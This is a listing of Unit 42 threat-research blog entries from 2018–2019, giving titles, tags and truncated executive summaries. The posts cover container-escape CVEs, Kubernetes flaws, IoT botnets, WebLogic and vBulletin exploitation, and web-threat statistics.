## What I Learned from Reverse Engineering Windows Containers
Daniel Prizmant
Published: December 12, 2019
Cloud Cybersecurity Research
Learning Hub
Vulnerabilities
Container security
Container vulnerability
Containers
Docker
Job Objects
JobObject
Kernel
Microsoft
Object Silo
Reverse Engineering
Reversing
ServerSilo
Windows
## Executive Summary
In recent years containers have become increasingly popular. A few years ago Microsoft realized that and teamed up with Docker to offer a container solution for Microsoft Windows.
Judging by the number of severe vulnerabilities found in containers for Linux in recent years, it is likely that some vulnerabilities exist in containers for Windows as well. Windo
Unit42
Server-Side Request Forgery Exposes Data of Technology, Industrial and Media Organizations
blogs_unit42·2019-11-26·CVSS 6.5
[MEDIUM] Server-Side Request Forgery Exposes Data of Technology, Industrial and Media Organizations
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Server-Side Request Forgery Exposes Data of Technology, Industrial and Media Organizations
Jay Chen
Published: November 26, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Container
Jira
Kubernetes
Metadata API
Misconfiguration
Public cloud
Server-Side Request Forgery
SSRF
## Executive Summary
Server-Side Request Forgery (SSRF) is a web application vulnerability that redirects the attacker's requests to the internal network or localhost behind the firewall. SSRF poses a particular threat to cloud services due to the use of the metadata API that allows applications to access the underlying cloud infrastructure's information such as configurations, logs, and credentials. Although th
Unit42
Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271
blogs_unit42·2019-11-19·CVSS 9.8
CVE-2019-14271 [CRITICAL] Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271
Yuval Avrahami
Published: November 19, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Container breakout
Container escape
Containers
CVE-2019-14271
Docker
Exploit
## Executive Summary
In the last few years, several vulnerabilities in the copy ( cp ) command were found in various container platforms, including Docker, Podman and Kubernetes. The most severe among those was only recently discovered and disclosed in July. Surprisingly, it gained almost no immediate attention, perhaps due to an ambiguous CVE description and a lack of a published exploit.
CVE-2019-14271 marks a security issue in the implementa
Unit42
Web-Based Threats: First Half 2019
blogs_unit42·2019-11-01
Web-Based Threats: First Half 2019
Threat Research Center
Trend Reports
Malware
## Web-Based Threats: First Half 2019
Fang Liu
Tao Yan
Jin Chen
Rongbo Shao
Zhanglin He
Bo Qu
Published: November 1, 2019
Malware
Trend Reports
Vulnerabilities
ELink
Exploit Kits
Malicious Domains
Malicious URL
Phishing
## Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system . In examining the data we collect, which includes URLs extracted from emails or submitted by API, we can identify patterns and trends which helps us discern prevalent web threats. This blog is the fifth installment in a series of posts tracking web-based threats over time, specifically, statistics pertaining to malicious URLs, domains, exploit kits, vulnerabilities, and phishing scams.
Unit42
Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
blogs_unit42·2019-10-31·CVSS 9.8
[CRITICAL] Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
Threat Research Center
Threat Research
Cybercrime
## Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
Asher Davila
Published: October 31, 2019
Cybercrime
Threat Research
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
WiFi routers
## Executive Summary
In September 2019, during the proactive IoT threat-hunting process conducted daily by the Unit 42 (formerly Zingbox security research) team, we discovered an updated Gafgyt variant attempting to infect IoT devices; specifically small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. This Gafgyt variant is a competing botnet to the JenX botnet, which also uses remote code execution exploits to gain access and recruit routers into botnets to attack gaming servers - mos
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
blogs_unit42·2019-10-09·CVSS 9.8
CVE-2019-16759 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
Qi Deng
Zhibin Zhang
Hui Gao
Published: October 9, 2019
Cybercrime
Threat Research
Vulnerabilities
CVE-2019-16759
Pre-auth remote code
VBulletin
## Executive Summary
A new zero-day vulnerability was recently disclosed for vBulletin, a proprietary Internet forum software and the assigned CVE number is CVE-2019-16759. Now, several weeks later, Unit 42 researchers have identified active exploitation of this vulnerability in the wild. By exploiting this vulnerability, an unauthenticated attacker can gain privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from thei
Unit42
Critical Vulnerability in Harbor Enables Privilege Escalation from Zero to Admin (CVE-2019-16097)
blogs_unit42·2019-09-18·CVSS 6.5
CVE-2019-16097 [MEDIUM] Critical Vulnerability in Harbor Enables Privilege Escalation from Zero to Admin (CVE-2019-16097)
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Critical Vulnerability in Harbor Enables Privilege Escalation from Zero to Admin (CVE-2019-16097)
Aviv Sasson
Published: September 18, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CNCF
Containers
CVE-2019-16097
Harbor
## Executive Summary
Aviv Sasson, a security researcher from the cloud division of Unit 42, has identified a critical vulnerability in a widespread cloud native registry called Harbor. The vulnerability allows attackers to take over Harbor registries by sending them a malicious request.
The maintainers of Harbor released a patch that closes this critical security hole. Versions 1.7.6 and 1.8.3 include this fix.
Unit 42 has found 1,300 Harbor registries open to the i
Unit42
The Legend of Adwind: A Commodity RAT Saga in Eight Parts
blogs_unit42·2019-09-17
The Legend of Adwind: A Commodity RAT Saga in Eight Parts
Threat Research Center
Threat Research
Malware
## The Legend of Adwind: A Commodity RAT Saga in Eight Parts
Unit 42
Published: September 17, 2019
Malware
Threat Research
Vulnerabilities
Adwind
Alien Spy
Commodity RAT
Frutas
JBifrost
JConnectPro
JSocket
UnknownRat
UnReCoM
## Executive Summary
In early 2012, a developer started selling the first of the Adwind family, Java-based remote access tools (RATs), called “Frutas.” In the ensuing years, it has been rebranded at least seven times. Its other names have included Adwind, UnReCoM, Alien Spy, JSocket, JBifrost, UnknownRat, and JConnectPro.
The Adwind RAT family remains prevalent in the wild. Palo Alto Networks has collected over 45,000 samples from the various Adwind iterations. We have observed these samples used in
Unit42
Unit 42 Named Top Zero-Day Vulnerability Contributor by Microsoft
blogs_unit42·2019-09-04·CVSS 7.8
[HIGH] Unit 42 Named Top Zero-Day Vulnerability Contributor by Microsoft
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Named Top Zero-Day Vulnerability Contributor by Microsoft
John Harrison
Published: September 4, 2019
Threat Research
Vulnerabilities
Microsoft Security Response Center
MSRC
Threat research
This piece was originally published August 16 on the Palo Alto Networks blog .
Palo Alto Networks is proud that Microsoft has recognized our Unit 42 global threat intelligence team with multiple awards for its contributions to vulnerability research, including first place for discovery of Zero Day vulnerabilities . Microsoft also recognized Unit 42 researchers Gal De Leon and Bar Lahav in its annual list of the Most Valuable Security Researchers .
Unit 42, which also won third place for “Vulnerability Top Contributor,” was t
Unit42
Exploitation of Windows CVE-2019-0708 (BlueKeep): Three Ways to Write Data into Kernel with RDP PDU
blogs_unit42·2019-08-29·CVSS 9.8
CVE-2019-0708 [CRITICAL] Exploitation of Windows CVE-2019-0708 (BlueKeep): Three Ways to Write Data into Kernel with RDP PDU
Threat Research Center
Threat Research
Vulnerabilities
## Exploitation of Windows CVE-2019-0708 (BlueKeep): Three Ways to Write Data into Kernel with RDP PDU
Tao Yan
Jin Chen
Published: August 29, 2019
Threat Research
Vulnerabilities
Bluekeep
CVE-2019-0708
RDP
## Executive Summary
In May 2019, Microsoft released an out-of-band patch update for remote code execution vulnerability CVE-2019-0708 , which is also known as “BlueKeep” and resides in code to Remote Desktop Services (RDS). This vulnerability is pre-authentication and requires no user interaction, making it particularly dangerous as it has the unsettling potential to be weaponized into a destructive exploit. If successfully exploited, this vulnerability could execute arbitrary code with “system” privileges. The Micr
Unit42
Non-Root Containers, Kubernetes CVE-2019-11245 and Why You Should Care
blogs_unit42·2019-08-28·CVSS 4.9
CVE-2019-11245 [MEDIUM] Non-Root Containers, Kubernetes CVE-2019-11245 and Why You Should Care
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Non-Root Containers, Kubernetes CVE-2019-11245 and Why You Should Care
Ariel Zelivansky
Published: August 28, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Containers
CVE-2019-11245
Kubernetes
On May 31th, the Kubernetes Product Security Committee announced a security regression in Kubernetes for which they had assigned CVE-2019-11245. The problem caused containers that use images which are supposed to run with a non root user to run as root, on the second time they are used or upon restart of the container.
Before elaborating on this particular security issue, let’s first clarify why running a program as root in a container is even a concern at all.
## Non-root containers
When run
Unit42
USBCreator D-Bus Privilege Escalation in Ubuntu Desktop
blogs_unit42·2019-07-12
USBCreator D-Bus Privilege Escalation in Ubuntu Desktop
Threat Research Center
Threat Research
Vulnerabilities
## USBCreator D-Bus Privilege Escalation in Ubuntu Desktop
Nadav Markus
Published: July 12, 2019
Threat Research
Vulnerabilities
Linux
Privilege escalation
Ubuntu
## Executive Summary
A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root - without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root. The issue was resolved in June when Ubuntu patched the relevant packages in response to a vulnerability disclosur
Unit42
Tale of a Windows Error Reporting Zero-Day (CVE-2019-0863)
blogs_unit42·2019-07-02·CVSS 7.8
CVE-2019-0863 [HIGH] Tale of a Windows Error Reporting Zero-Day (CVE-2019-0863)
Threat Research Center
Threat Research
Vulnerabilities
## Tale of a Windows Error Reporting Zero-Day (CVE-2019-0863)
Gal De Leon
Published: July 2, 2019
Threat Research
Vulnerabilities
CVE-2019-0863
Windows
In December 2018, a hacker who goes by the alias ‘SandboxEscaper’ publicly disclosed a zero-day vulnerability in the Windows Error Reporting (WER) component. Digging deeper into her submission, I discovered another zero-day vulnerability, which could be abused to elevate system privileges. According to the Microsoft advisory, attackers exploited this bug as a zero-day in the wild until the patch was released in May 2019.
So how did this bug work exactly?
## Microsoft WER Under the Hood
The Windows Error Reporting tool is a flexible event-based feedback infrastructure de
Unit42
TCP SACK Panics Linux Servers
blogs_unit42·2019-06-21·CVSS 7.5
CVE-2019-11477 [HIGH] TCP SACK Panics Linux Servers
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## TCP SACK Panics Linux Servers
Unit 42
Published: June 21, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
AWS
Azure
CVE-2019-11477
CVE-2019-11478
CVE-2019-11479
GCP
Linux
Public cloud
SACK
## Executive Summary
The newly discovered Linux vulnerabilities , CVE-2019-11477 , CVE-2019-11478 , and CVE-2019-11479 , affect all Linux operating systems newer than kernel 2.6.29 (released on March 2009) or above and can cause a kernel panic to systems with services listening on a TCP connection. This remote attack can put a server into a Denial of Service (DoS) state, but remote code execution is not of concern. The vulnerability roots on the flaws in the TCP Selective Acknowledgement (SACK)
Unit42
Unit 42 Discovers 10 New Microsoft Vulnerabilities
blogs_unit42·2019-06-20·CVSS 7.5
[HIGH] Unit 42 Discovers 10 New Microsoft Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Discovers 10 New Microsoft Vulnerabilities
John Harrison
Published: June 20, 2019
Threat Research
Vulnerabilities
Microsoft
Palo Alto Networks Unit 42 threat researchers have discovered one new vulnerability addressed by the Microsoft Security Response Center (MSRC) as part of their June 2019 security update release, as well as nine additional vulnerabilities that were addressed in May 2019. The severity of the vulnerabilities discovered were all rated “Important.”
Palo Alto Networks customers who deploy our Next-Generation Security Platform according to best practices and have a Threat Prevention Subscription are protected from zero-day vulnerabilities such as these. Weaponized exploits for these vulnerabilities
Unit42
Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
blogs_unit42·2019-06-12·CVSS 9.8
CVE-2018-20062 [CRITICAL] Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Threat Research Center
Threat Research
Vulnerabilities
## Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Ruchna Nigam
Published: June 12, 2019
Threat Research
Vulnerabilities
CVE-2018-20062
CVE-2019-7238
Exploits
HideNSeek
IoT
Linux
ThinkPHP
Executive Summary
The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
Since its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new exploits, to targeting Android devices via the Android Debug Bridge (ADB).
This post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits - CVE-2018-20062 which targets Thin
Unit42
New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
blogs_unit42·2019-06-07·CVSS 9.8
CVE-2017-5174 [CRITICAL] New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Threat Research Center
Threat Research
Malware
## New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Ruchna Nigam
Published: June 6, 2019
Malware
Threat Research
Vulnerabilities
CVE-2017-5174
CVE-2018-11510
CVE-2018-17173
CVE-2018-6961
CVE-2019-2725
CVE-2019-3929
Exploits
IoT
Linux
Mirai
Executive Summary
Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets.
As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless prese
Unit42
Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
blogs_unit42·2019-05-30·CVSS 8.8
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Threat Research Center
Trend Reports
Malware
## Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: May 30, 2019
Malware
Trend Reports
Vulnerabilities
Azorult
CVE-2018-8174
ELink
Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system . In examining the data it collects, which are URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fourth (4th quarter of 2018) installment in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, CVEs, and now, ph
Unit42
Breaking Out of rkt – 3 New Unpatched CVEs
blogs_unit42·2019-05-30·CVSS 7.7
CVE-2019-10147 [HIGH] Breaking Out of rkt – 3 New Unpatched CVEs
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Breaking Out of rkt – 3 New Unpatched CVEs
Yuval Avrahami
Published: May 30, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2019-10147
Docker. CVE-2019-10144. CVE-2019-10145
## Executive Summary
Back in February, I wrote a piece on the major runC vulnerability, CVE-2019-5736. The fundamental flaw behind this vulnerability affected most container runtimes, such as LXC and Apache Mesos. One container runtime which seemed to be unfazed was CoreOS rkt , on which I heard a lot back when I first started to get into containers. So naturally, I was intrigued to check out rkt’s architecture and see what they did differently, and I recently had some time to do so.
I ended up finding 3 other
Unit42
Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
blogs_unit42·2019-05-03·CVSS 9.8
CVE-2019-2725 [CRITICAL] Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
Threat Research Center
Threat Research
Vulnerabilities
## Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
Ken Hsu
Matthew Tennis
Yanhui Jia
Zhibin Zhang
Durgesh Sangvikar
Published: May 3, 2019
Malware
Threat Research
Vulnerabilities
CVE-2019-2725
Exploits
GandCrab
Oracle WebLogic
Sodinokibi
XMRig
Executive Summary
Unit 42 researchers at Palo Alto Networks have uncovered exploitation activity against an Oracle WebLogic zero-day critical deserialization vulnerability ( CVE-2019-2725 ) that occurred before the release of the out-of-band patch by Oracle on April 26, 2019. Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Once the vulnerability was made publ
Unit42
Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
blogs_unit42·2019-04-30·CVSS 7.5
CVE-2019-2725 [HIGH] Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
Threat Research Center
Threat Research
Vulnerabilities
## Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
Cong Zheng
Yanhui Jia
Published: April 30, 2019
Malware
Threat Research
Vulnerabilities
Botnet
Exploit
Linux Malware
Muhstik
WebLogic
Executive Summary
On April 28th, 2019, Unit 42 discovered a new variant of the Linux botnet Muhstik. This new version exploits the latest WebLogic server vulnerability ( CVE-2019-2725 ), just disclosed five days ago, to install itself on vulnerable systems. Oracle released an emergency patch for the vulnerability on April 26, 2019. We have confirmed that the patch successfully protects against this latest version of Muhstik.
From the timeline, we can see that the developer of Muhstik watches
Unit42
Exploits in the Wild for WordPress Social Warfare Plugin CVE-2019-9978
blogs_unit42·2019-04-22·CVSS 6.1
CVE-2019-9978 [MEDIUM] Exploits in the Wild for WordPress Social Warfare Plugin CVE-2019-9978
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for WordPress Social Warfare Plugin CVE-2019-9978
Qi Deng
Zhibin Zhang
Hui Gao
Published: April 22, 2019
Threat Research
Vulnerabilities
CVE-2019-9978
Social Warfare Plugin
WordPress
On 21 March, researchers disclosed two vulnerabilities in Social Warfare , a very popular plugin in WordPress which adds social share buttons to a website or blog. One vulnerability is a Stored Cross-site Scripting Attack (XSS) vulnerability and the other is a remote code execution (RCE) vulnerability, both are tracked by CVE-2019-9978 . Both vulnerabilities are present in versions 3.5.0-3.5.2 of Social Warfare: a fix was released on 21 March and is in version 3.5.3. Approximately 60,000 active installations were foun
Unit42
Disclosing a directory traversal vulnerability in Kubernetes copy – CVE-2019-1002101
blogs_unit42·2019-03-28·CVSS 4.2
CVE-2019-1002101 [MEDIUM] Disclosing a directory traversal vulnerability in Kubernetes copy – CVE-2019-1002101
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Disclosing a directory traversal vulnerability in Kubernetes copy – CVE-2019-1002101
Ariel Zelivansky
Published: March 28, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2019-1002101
Kubernetes
## Executive Overview
On March 4, I reported a security vulnerability in kubectl to the Kubernetes and OpenShift security teams, which was assigned CVE-2019-1002101. This post explains the discovery process, the vulnerability details and its impact and exploitation methods. Thanks to Brandon Phillips Red Hat for coordinating the disclosure process. The announcement made today by the Kubernetes team can be found here .
## Vulnerability discovery
I was exploring Kubernetes commands when a
Unit42
Unit 42 Vulnerability Research Team Discovers 23 New Vulnerabilities February 2019 Disclosures – Adobe and Microsoft
blogs_unit42·2019-02-22·CVSS 7.8
[HIGH] Unit 42 Vulnerability Research Team Discovers 23 New Vulnerabilities February 2019 Disclosures – Adobe and Microsoft
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Vulnerability Research Team Discovers 23 New Vulnerabilities February 2019 Disclosures – Adobe and Microsoft
John Harrison
Published: February 22, 2019
Threat Research
Vulnerabilities
Adobe
Microsoft
Zero-day
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 threat researchers have discovered 23 new vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their February 2019 APSB19-07 security update release and 2 vulnerabilities addressed by the Microsoft Security Response Center (MSRC) as part of their February 2019 security update release. Severity ratings ranged from Important to Critical for each of these vulnerabilitie
Unit42
Breaking out of Docker via runC – Explaining CVE-2019-5736
blogs_unit42·2019-02-21·CVSS 8.6
CVE-2019-5736 [HIGH] Breaking out of Docker via runC – Explaining CVE-2019-5736
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Breaking out of Docker via runC – Explaining CVE-2019-5736
Yuval Avrahami
Published: February 21, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Container breakout
Container escape
Containers
CVE-2019-5736
Docker
Exploit
RunC
Last week (2019-02-11) a new vulnerability in runC was reported by its maintainers, originally found by Adam Iwaniuk and Borys Poplawski. Dubbed CVE-2019-5736, it affects Docker containers running in default settings and can be used by an attacker to gain root-level access on the host.
Aleksa Sarai, one of runC’s maintainers, found that the same fundamental flaw exists in LXC. As opposed to Docker though, only privileged LXC containers are vulnerable. Both runC
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
CVE-2015-5119 [CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Threat Research Center
Trend Reports
Malware
## Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Xingyu Jin
Published: December 27, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2015-5119
ELink
## Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which helps us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain d
Unit42
Threat Brief: Twelve Tips for the Holidays
blogs_unit42·2018-12-13
Threat Brief: Twelve Tips for the Holidays
## Threat Brief: Twelve Tips for the Holidays
Unit 42
Published: December 13, 2018
High Profile Threats
Learning Hub
Devices
Holidays
Home security
IoT
Privacy
This time every year, people all over the world get new devices. Regardless of what holiday(s) you may (or may not) celebrate, the end of the year is a time for people to give and receive some of the latest devices to come on to the market.
Nothing spoils a new gadget more than having some kind of security or privacy problem related to it. After that, nothing spoils the fun and excitement of unboxing and playing with an exciting new device than trying to figure out what you need to do to use it with reasonable safety and privacy.
To that end, we’re providing some very basic, but critical steps that you, your family, you
Unit42
Demystifying Kubernetes CVE-2018-1002105 (and a dead simple exploit)
blogs_unit42·2018-12-09·CVSS 9.8
CVE-2018-1002105 [CRITICAL] Demystifying Kubernetes CVE-2018-1002105 (and a dead simple exploit)
## Demystifying Kubernetes CVE-2018-1002105 (and a dead simple exploit)
Ariel Zelivansky
Published: December 9, 2018
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2018-1002105
Kubernetes
Earlier this week a major vulnerability in Kubernetes was made public by its maintainers. It was originally caught as a bug by Darren Shepherd and was later marked as a critical vulnerability and assigned CVE-2018-1002105. Its implications were clearly laid out in its Github issue page by Kubernetes developer Jordan Liggitt. The bug was fixed and new versions were tagged for all supported Kubernetes releases.
Many technology news sites published articles with warnings, and cloud providers followed with their own updates and mitigations ( Google , Azure , AWS ). At Twistlock, ou
Unit42
Inception Attackers Target Europe with Year-old Office Vulnerability
blogs_unit42·2018-11-05·CVSS 8.8
CVE-2012-1856 [HIGH] Inception Attackers Target Europe with Year-old Office Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## Inception Attackers Target Europe with Year-old Office Vulnerability
Tom Lancaster
Published: November 5, 2018
Malware
Threat Research
Vulnerabilities
CVE-2012-1856
CVE-2017-11882
EMEA
Espionage
Government
Inception
PowerShell
PowerShower
Remote Templates
The Inception attackers have been active since at least 2014 and have been documented previously by both Blue Coat and Symantec ; historical attacks used custom malware for a variety of platforms, and targeting a range of industries, primarily in Russia, but also around the world. This blog describes attacks against European targets observed in October 2018, using CVE-2017-11882 and a new PowerShell backdoor we’re calling POWERSHOWER due to the attention to deta
Unit42
Threat Brief: Embrace Mobile Banking with Caution
blogs_unit42·2018-10-23
Threat Brief: Embrace Mobile Banking with Caution
## Threat Brief: Embrace Mobile Banking with Caution
Unit 42
Published: October 23, 2018
High Profile Threats
Learning Hub
Banking
Banking trojans
Mobile
Online banking
The Brazilian Central Bank recently announced that 2017 was the first year in which people did more banking using mobile devices than on PCs. There were 24.5 billion mobile banking transactions while there were 20.6 billion PC-based transactions.
Not all countries are embracing mobile banking as quickly as Brazil. But, mobile banking use is picking up around the globe.
What is it?
As more people move to mobile banking, we believe attackers will focus their attacks away from PC banking and towards mobile banking. This means the risks of losing control of your accounts through mobile online banking are likely to
Unit42
Unit 42 Vulnerability Research October 2018 Disclosures – Adobe
blogs_unit42·2018-10-05·CVSS 7.8
[HIGH] Unit 42 Vulnerability Research October 2018 Disclosures – Adobe
## Unit 42 Vulnerability Research October 2018 Disclosures – Adobe
Unit 42
Published: October 5, 2018
Threat Research
Vulnerabilities
Adobe
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 researchers have discovered ten vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their October 2018 APSB18-30 security update release .
CVE
Vulnerability Category
Impact
Maximum Severity Rating
Researcher(s)
CVE-2018-12769
Use After Free
Arbitrary Code Execution
Critical
Gal De Leon
CVE-2018-12832
Heap Overflow
Arbitrary Code Execution
Critical
Gal De Leon
CVE-2018-12836
Heap Overflow
Arbitrary Code Execution
Critical
Gal De Leon
CVE-2018-12846
Heap Overflow
Arbitrary Code Execu
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
CVE-2017-5638 [CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Threat Research Center
Threat Research
Malware
## Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Ruchna Nigam
Published: September 9, 2018
Malware
Threat Research
Vulnerabilities
Apache Struts
BlackNurse
Botnet
CVE-2017-5638
CVE-2018-9866
Exploits
Gafgyt
IoT
Linux
Mirai
SonicWall RCE
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
The new Gafgyt version targets a newly disclosed vulnerability affectin
Unit42
Traps Prevents In-The-Wild VBScript Zero-Day Exploit in Internet Explorer
blogs_unit42·2018-09-07·CVSS 7.5
CVE-2018-8373 [HIGH] Traps Prevents In-The-Wild VBScript Zero-Day Exploit in Internet Explorer
Threat Research Center
Threat Research
Vulnerabilities
## Traps Prevents In-The-Wild VBScript Zero-Day Exploit in Internet Explorer
Tomer Harpaz
Maor Dokhanian
Published: September 7, 2018
Malware
Threat Research
Vulnerabilities
CVE-2018-8373
DarkHotel
On August 15, Trend Micro published a blog post detailing a high-risk vulnerability in the VBScript Engine of Microsoft Internet Explorer being exploited in-the-wild ( CVE-2018-8373 ). This vulnerability still affects endpoints running the latest versions of Internet Explorer and Windows which do not have the relevant patches applied.
The exploit was served on a malicious web host: hxxp://windows-updater[.]net/realmuto/wood.php?who=1?????? which was linked to the DarkHotel APT campaign by Qihoo 360 , and this actor also exploi
Unit42
Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware
blogs_unit42·2018-09-06·CVSS 7.8
CVE-2018-5002 [HIGH] Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware
## Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware
Dominik Reichel
Esmid Idrizovic
Published: September 6, 2018
Malware
Threat Research
Vulnerabilities
Adobe
CHAINSHOT
CVE-2018-5002
Zero-day
This story begins with one of our blog authors, who, following the discovery of a new Adobe Flash 0-day , found several documents using the same exploit that were used in targeted attacks. We were also able to collect network captures including the encrypted malware payload. Armed with these initial weaponized documents, we uncovered additional attacker network infrastructure, were able to crack the 512-bit RSA keys, and decrypt the exploit and malware payloads. We have dubbed the malware ‘CHAINSHOT’, because it is a targeted attack with several stages and every stage depen
Unit42
Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
blogs_unit42·2018-09-05·CVSS 7.5
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Threat Research Center
Trend Reports
Vulnerabilities
## Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: September 5, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2018-8174
ELink
Executive Summary
In Q2, the United States was number one for hosting malicious domains and exploit kits.
Unit 42 regularly analyzes statistical data from our Email Link Analysis (ELINK) to understand the patterns and trends in current web threats. This blog outlines our analysis for April – June (Q2) 2018 and follows up our previous blog analyzing web-based threats for January – March (Q1) 2018 that can be found here . We also provide detailed analysis of attacks against CVE-2018-8174 (a vulnerabil
Unit42
Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776
blogs_unit42·2018-08-24·CVSS 8.8
CVE-2018-11776 [HIGH] Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776
## Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776
Unit 42
Published: August 24, 2018
High Profile Threats
Vulnerabilities
Apache
CVE-2018-11776
Protections
Struts
Situation Overview
On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-1176 , a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. The Apache Foundation has urged everyone to apply the security updates as soon as possible.
This blog is to provide information to help organizations assess their risk of the vulnerability and to inform Palo Alto Networks customers of protections in place that can help mitigate their risk until they can apply the security updates. Palo Alto Networks customers who have d
Unit42
